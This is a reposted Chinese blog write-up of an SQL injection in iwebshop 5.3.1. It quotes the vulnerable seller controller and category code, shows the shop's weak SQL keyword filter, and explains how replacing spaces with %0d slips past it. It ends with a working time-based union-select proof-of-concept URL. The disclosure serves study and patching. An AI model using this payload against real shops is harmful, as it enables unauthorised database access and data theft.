Iwebshop sql注入

栏目: 数据库 · 发布时间: 5年前

内容简介:iwebshop最新版存在一个非常弱智的注入漏洞主要导致原因开发者忘记写成

iwebshop 最新版本5.3.1 前台注入

iwebshop最新版存在一个非常弱智的注入漏洞

主要导致原因 $id = IFilter::act(IReq::get('id'));

开发者忘记写成 IFilter::act(IReq::get('id'), 'int') 了,导致直接注入. 在其他文件也存在这个问题.

这个文件需要商家账号才可以访问,是可以注册的

漏洞点 controllers/seller.php 函数 categoryAjax

public function categoryAjax()
    {
        $id        = IFilter::act(IReq::get('id'));
        $parent_id = IFilter::act(IReq::get('parent_id'));
        if($id && is_array($id))
        {
            foreach($id as $category_id)
            {
                $childString = goods_class::catChild($category_id);//父类ID不能死循环设置成其子分类
                if($parent_id > 0 && stripos(",".$childString.",",",".$parent_id.",") !== false)
                {                    die(JSON::encode(array('result' => 'fail')));                }
            }

直接将id传入到 catChild

public static function catChild($catId,$level = 1)
    {        if($level == 0)        {
            return $catId;
        }

        $temp   = array();
        $result = array($catId);        $catDB  = new IModel('category');
        while(true)
        {
            $id = current($result);
            if(!$id)
            {
                break;
            }
            $temp = $catDB->query('parent_id = '.$id);

直接将id拼接到 sql 查询中.. 这个cms有一点sql过滤,但是非常弱,也就ctf入门题的水平

lib/core/util/filter_class.php

public static function string($str,$limitLen = false)
    {
        $str = trim($str);
        $str = self::limitLen($str,$limitLen);
        $str = htmlspecialchars($str,ENT_NOQUOTES);
        return self::addSlash($str);
    }
    
  
    public static function word($str)
    {
        $word = array("select ","select/*","update ","update/*","delete ","delete/*","insert into","insert/*","updatexml","concat","()","/**/","union(");
        foreach($word as $val)
        {
            if(stripos($str,$val) !== false)
            {
                return '';
            }
        }
        return self::removeEmoji($str);
    }

不允许 union 加空格,可是空格的代替很多 比如 %0d

poc

/index.php?controller=seller&action=categoryAjax&id[]=1%20and%201=1%20union%0dselect%0d1,2,3,4,5,6,7,8,sleep(5)

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Google御用網頁語言Node.js

Google御用網頁語言Node.js

郭家寶 / 佳魁資訊 / 2013-4-26 / NT 490

這是一本 Node.js 的入門教學,寫給想要學習 Node.js,但沒有任何系統的經驗的開發者。如果你聽說過 Node.js,並被它許多神奇的特性吸引,本書就是為你準備的。 透過閱讀本書,你可以對 Node.js 有全面的認識,學會如何用 Node.js 程式設計,了解事件驅動、非同步式 I/O 的程式設計模式,同時還可以了解一些使用JavaScript 進行函數式程式設計的方法。 ......一起来看看 《Google御用網頁語言Node.js》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具